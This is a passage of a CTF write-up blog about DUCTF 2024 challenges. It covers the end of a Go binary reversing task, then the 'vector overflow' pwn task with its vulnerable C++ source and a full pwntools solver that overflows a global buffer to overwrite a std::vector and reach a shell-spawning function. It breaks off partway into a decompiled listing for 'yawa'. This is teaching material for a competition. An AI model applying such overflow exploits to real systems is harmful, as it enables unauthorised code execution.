title=\"image-20240710214133949\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reading through the code of <code class=\"language-text\">main.RunSSH.MiddlewareWithLogger.func8.1</code> carefully, I found the following branch where the input value is compared against the text <code class=\"language-text\">UnlockTheCells</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    
class=\"gatsby-resp-image-link\"\n    href=\"/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/54c3a/image-20240710220108173.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/8ac56/image-20240710220108173.webp 240w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/d3be9/image-20240710220108173.webp 480w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/e46b2/image-20240710220108173.webp 960w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/62664/image-20240710220108173.webp 1257w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/8ff5a/image-20240710220108173.png 240w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/e85cb/image-20240710220108173.png 480w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/d9199/image-20240710220108173.png 960w,\n/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/54c3a/image-20240710220108173.png 1257w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2aac64ea2ae1be42a2a6b3acfcb44c4c/d9199/image-20240710220108173.png\"\n            alt=\"image-20240710220108173\"\n            title=\"image-20240710220108173\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I opened an SSH connection that executed this command, and I was 
able to obtain the correct flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 746px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b442562e63a67da087ea9f66b288e9eb/62de4/image-20240710220403373.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b442562e63a67da087ea9f66b288e9eb/8ac56/image-20240710220403373.webp 240w,\n/static/b442562e63a67da087ea9f66b288e9eb/d3be9/image-20240710220403373.webp 480w,\n/static/b442562e63a67da087ea9f66b288e9eb/f7ebd/image-20240710220403373.webp 746w\"\n              sizes=\"(max-width: 746px) 100vw, 746px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b442562e63a67da087ea9f66b288e9eb/8ff5a/image-20240710220403373.png 240w,\n/static/b442562e63a67da087ea9f66b288e9eb/e85cb/image-20240710220403373.png 480w,\n/static/b442562e63a67da087ea9f66b288e9eb/62de4/image-20240710220403373.png 746w\"\n            sizes=\"(max-width: 746px) 100vw, 746px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b442562e63a67da087ea9f66b288e9eb/62de4/image-20240710220403373.png\"\n            alt=\"image-20240710220403373\"\n            title=\"image-20240710220403373\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Analyzing Go 
binaries was difficult.</p>\n<h2 id=\"vector-overflowpwn\" style=\"position:relative;\"><a href=\"#vector-overflowpwn\" aria-label=\"vector overflowpwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>vector overflow(Pwn)</h2>\n<blockquote>\n<p>vector overflow</p>\n</blockquote>\n<p>The challenge provides the binary and the following C++ source code.</p>\n<p>In this binary, the global variables <code class=\"language-text\">buf</code> and <code class=\"language-text\">vector v</code> are defined.</p>\n<div class=\"gatsby-highlight\" data-language=\"cpp\"><pre class=\"language-cpp\"><code class=\"language-cpp\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;cstdlib></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;iostream></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;vector></span></span>\n\n<span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">16</span><span 
class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\nstd<span class=\"token operator\">::</span>vector<span class=\"token operator\">&lt;</span><span class=\"token keyword\">char</span><span class=\"token operator\">></span> v <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token char\">'X'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'X'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'X'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'X'</span><span class=\"token punctuation\">,</span> <span class=\"token char\">'X'</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">lose</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Bye!\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/bin/sh\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span 
class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">char</span> ductf<span class=\"token punctuation\">[</span><span class=\"token number\">6</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"DUCTF\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">char</span><span class=\"token operator\">*</span> d <span class=\"token operator\">=</span> ductf<span class=\"token punctuation\">;</span>\n\n    std<span class=\"token operator\">::</span>cin <span class=\"token operator\">>></span> buf<span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span>v<span class=\"token punctuation\">.</span><span class=\"token function\">size</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">5</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">for</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">auto</span> <span class=\"token operator\">&amp;</span>c <span class=\"token operator\">:</span> v<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n            <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span>c <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span>d<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token 
{">
punctuation\">{</span>\n                <span class=\"token function\">lose</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n            <span class=\"token punctuation\">}</span>\n        <span class=\"token punctuation\">}</span>\n\n        <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n\n    <span class=\"token function\">lose</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The obvious vulnerability is the unbounded <code class=\"language-text\">std::cin >> buf</code> into the 16-byte <code class=\"language-text\">buf</code>, and the overflow runs into the global <code class=\"language-text\">v</code> that follows it. From <code class=\"language-text\">if(v.size() == 5)</code> onward, however, the program interprets that memory as a vector object rather than as plain text, so tampering with it via the overflow requires crafting the input carefully.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 858px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/936cff7b6f936cfa5d290717e1a444b1/42d54/image-20240706153224836.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 10.833333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeElEQVQI10WIQQ6CMBAA+UfZbiEFt6lQjQ8waOBojOH/XxkrFw+TmUyTppmYC25IiHZYPlcHkhVSzHgfcK3Qisf9+LVX/DDiT4bEATU7kK6nKbcPdt2R9EL7lenyRruVMu/k+mLtoE/EL3/0QbANHbfDovW5OyILXyVbOwxCvM54AAAAAElFTkSuQmCC'); 
background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/936cff7b6f936cfa5d290717e1a444b1/8ac56/image-20240706153224836.webp 240w,\n/static/936cff7b6f936cfa5d290717e1a444b1/d3be9/image-20240706153224836.webp 480w,\n/static/936cff7b6f936cfa5d290717e1a444b1/41e9e/image-20240706153224836.webp 858w\"\n              sizes=\"(max-width: 858px) 100vw, 858px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/936cff7b6f936cfa5d290717e1a444b1/8ff5a/image-20240706153224836.png 240w,\n/static/936cff7b6f936cfa5d290717e1a444b1/e85cb/image-20240706153224836.png 480w,\n/static/936cff7b6f936cfa5d290717e1a444b1/42d54/image-20240706153224836.png 858w\"\n            sizes=\"(max-width: 858px) 100vw, 858px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/936cff7b6f936cfa5d290717e1a444b1/42d54/image-20240706153224836.png\"\n            alt=\"image-20240706153224836\"\n            title=\"image-20240706153224836\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The vector object stores a pointer to the start of its buffer as its first field, followed by a pointer to the end of its elements; <code class=\"language-text\">size()</code> is computed as the difference between the two.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ed46da1b12b3e57f05a7c97482895758/51800/image-20240706153305405.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 72.91666666666666%; position: relative; bottom: 0; left: 0; 
background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ed46da1b12b3e57f05a7c97482895758/8ac56/image-20240706153305405.webp 240w,\n/static/ed46da1b12b3e57f05a7c97482895758/d3be9/image-20240706153305405.webp 480w,\n/static/ed46da1b12b3e57f05a7c97482895758/e46b2/image-20240706153305405.webp 960w,\n/static/ed46da1b12b3e57f05a7c97482895758/31d32/image-20240706153305405.webp 1196w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ed46da1b12b3e57f05a7c97482895758/8ff5a/image-20240706153305405.png 240w,\n/static/ed46da1b12b3e57f05a7c97482895758/e85cb/image-20240706153305405.png 480w,\n/static/ed46da1b12b3e57f05a7c97482895758/d9199/image-20240706153305405.png 960w,\n/static/ed46da1b12b3e57f05a7c97482895758/51800/image-20240706153305405.png 1196w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ed46da1b12b3e57f05a7c97482895758/d9199/image-20240706153305405.png\"\n            alt=\"image-20240706153305405\"\n            title=\"image-20240706153305405\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 930px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/340a486a7fdeab7961044e62618bb6c0/416ee/image-20240706153325903.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    
class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 32.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABHUlEQVQoz5WRyXbCMAxFPSVxbDIzFTK0QIBQoN31/7/s9YUsuoFFFzpP0pGuJVm01uJ8PGC332G4DFitlvAzjyxP4b2EjQVSLzCjxtGkif/LhcEUe/qOJpL6E2V3R7YZMKtqNG0NG1nGIYqFRG4EAjYpqtSTGjOBAqpS9M3kj3mRbm9I6y8kVF81D6CSCkEuYKXARQjUgmClUTFfaoOAsWD+qY3ArBmB1wdwv/+AczGikkC+eJASPyzstcZgI5xdwlXda2BW35G33xjBft6i5z2dcwgLArnijlNdWVgSvI5ClMZAKvUamGzvSLiyf7vCzd9xPPWIY05Y8RM4YcP14lfNz2zZ9Gj6G9bdCYtNh6LIedwAxgloHlz/B0b7BbKFnNVznoDdAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/340a486a7fdeab7961044e62618bb6c0/8ac56/image-20240706153325903.webp 240w,\n/static/340a486a7fdeab7961044e62618bb6c0/d3be9/image-20240706153325903.webp 480w,\n/static/340a486a7fdeab7961044e62618bb6c0/6eb96/image-20240706153325903.webp 930w\"\n              sizes=\"(max-width: 930px) 100vw, 930px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/340a486a7fdeab7961044e62618bb6c0/8ff5a/image-20240706153325903.png 240w,\n/static/340a486a7fdeab7961044e62618bb6c0/e85cb/image-20240706153325903.png 480w,\n/static/340a486a7fdeab7961044e62618bb6c0/416ee/image-20240706153325903.png 930w\"\n            sizes=\"(max-width: 930px) 100vw, 930px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/340a486a7fdeab7961044e62618bb6c0/416ee/image-20240706153325903.png\"\n            alt=\"image-20240706153325903\"\n            title=\"image-20240706153325903\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      
class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 612px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/eda4100b4cc79069e093f123fc482a0a/8c76f/image-20240706153424460.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 11.249999999999998%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfUlEQVQI12WNyw6CMBQFuylgxXiJSptIQ2QBCfIQEfD/f2zUbl1MZnXmqHNywKYnbHLESoz3F8qy5DlPDGNP09Q4Z8ltThxHKKXIMqHwxR9aa5SRK3tXY8QztZ40jb5jy2uZA7/wvWvp+g4RCcGqurG9V9ZtCR4fQzg3ZscHN3w1dBuMpL4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/eda4100b4cc79069e093f123fc482a0a/8ac56/image-20240706153424460.webp 240w,\n/static/eda4100b4cc79069e093f123fc482a0a/d3be9/image-20240706153424460.webp 480w,\n/static/eda4100b4cc79069e093f123fc482a0a/d1d8c/image-20240706153424460.webp 612w\"\n              sizes=\"(max-width: 612px) 100vw, 612px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/eda4100b4cc79069e093f123fc482a0a/8ff5a/image-20240706153424460.png 240w,\n/static/eda4100b4cc79069e093f123fc482a0a/e85cb/image-20240706153424460.png 480w,\n/static/eda4100b4cc79069e093f123fc482a0a/8c76f/image-20240706153424460.png 612w\"\n            sizes=\"(max-width: 612px) 100vw, 612px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/eda4100b4cc79069e093f123fc482a0a/8c76f/image-20240706153424460.png\"\n            alt=\"image-20240706153424460\"\n            title=\"image-20240706153424460\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I used a buffer overflow to place, into the vector, a pointer to an address containing the string <code class=\"language-text\">DUCTF</code>, and then placed the address 5 bytes past that as the next address, thereby overriding the vector.</p>\n<p>You can get the flag by running the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">from pwn import <span class=\"token operator\">*</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Set context</span></span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Set target</span></span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./vector_overflow\"</span>\nexe <span class=\"token operator\">=</span> <span class=\"token function\">ELF</span><span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\ntarget <span class=\"token operator\">=</span> <span class=\"token function\">remote</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"2024.ductf.dev\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30013</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token macro property\"><span 
class=\"token directive-hash\">#</span> <span class=\"token expression\">Exploit</span></span>\npayload <span class=\"token operator\">=</span> b<span class=\"token string\">\"DUCTF\\x00\"</span> <span class=\"token operator\">+</span> b<span class=\"token string\">\"A\"</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token number\">16</span><span class=\"token operator\">-</span><span class=\"token number\">6</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token function\">p64</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x4051e0</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token function\">p64</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x4051e0</span><span class=\"token operator\">+</span><span class=\"token number\">5</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span><span class=\"token function\">sendline</span><span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Finish exploit</span></span>\ntarget<span class=\"token punctuation\">.</span><span class=\"token function\">interactive</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span><span class=\"token function\">clean</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 851px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    
href=\"/static/ddeb5daf0a775dfc3315d20bb392051e/0fcea/image-20240706153124754.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7ElEQVQoz5WQzW6EIACEEdSIWGQPq678Lqtxbfv+rzdF2qSXbRMPX4YQMswMUVeJ+DRwy4QQLdbtHfvHJx7rBuPv0C5gth434zBMM4abxqQtjLWwzmLWM4zR4JyDEAJSsgr7vqOuOK5jDR8FXGjQX+rvB2dpeIN7DGCshJIE00gxXAgGRsHTHSsTjGWtqipTpnNRFK8Nx2nAsi5w3sLPGtFYxKSbNQipkug6dAkp5Q9vmcP0paHTGr1SoJSCHL8mipSO0CKnOl15CT6lc3lYpfo0bgPRtr8jn+WRzGQyOuoIIdCKNuth+OdO//AFK6KcAFOCi9sAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ddeb5daf0a775dfc3315d20bb392051e/8ac56/image-20240706153124754.webp 240w,\n/static/ddeb5daf0a775dfc3315d20bb392051e/d3be9/image-20240706153124754.webp 480w,\n/static/ddeb5daf0a775dfc3315d20bb392051e/155dd/image-20240706153124754.webp 851w\"\n              sizes=\"(max-width: 851px) 100vw, 851px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ddeb5daf0a775dfc3315d20bb392051e/8ff5a/image-20240706153124754.png 240w,\n/static/ddeb5daf0a775dfc3315d20bb392051e/e85cb/image-20240706153124754.png 480w,\n/static/ddeb5daf0a775dfc3315d20bb392051e/0fcea/image-20240706153124754.png 851w\"\n            sizes=\"(max-width: 851px) 100vw, 851px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ddeb5daf0a775dfc3315d20bb392051e/0fcea/image-20240706153124754.png\"\n            alt=\"image-20240706153124754\"\n            title=\"image-20240706153124754\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"yawapwn\" style=\"position:relative;\"><a href=\"#yawapwn\" aria-label=\"yawapwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>yawa(Pwn)</h2>\n<blockquote>\n<p>Yet another welcome application.</p>\n</blockquote>\n<p>The challenge provides an ELF file and a library file.</p>\n<p>When I decompiled the binary, I got the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">undefined4 <span class=\"token function\">menu</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">long</span> in_FS_OFFSET<span class=\"token punctuation\">;</span>\n  undefined4 local_14<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> local_10<span class=\"token punctuation\">;</span>\n  \n  local_10 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"1. Tell me your name\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"2. Get a personalised greeting\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"> \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">__isoc99_scanf</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>DAT_00102042<span class=\"token punctuation\">,</span><span class=\"token operator\">&amp;</span>local_14<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>local_10 <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token 
punctuation\">}</span>\n  <span class=\"token keyword\">return</span> local_14<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\nundefined8 <span class=\"token function\">main</span><span class=\"token punctuation\">(</span>EVP_PKEY_CTX <span class=\"token operator\">*</span>param_1<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> iVar1<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> in_FS_OFFSET<span class=\"token punctuation\">;</span>\n  undefined name <span class=\"token punctuation\">[</span><span class=\"token number\">88</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> local_10<span class=\"token punctuation\">;</span>\n  \n  local_10 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">init</span><span class=\"token punctuation\">(</span>param_1<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">while</span><span class=\"token punctuation\">(</span> true <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">while</span><span class=\"token punctuation\">(</span> 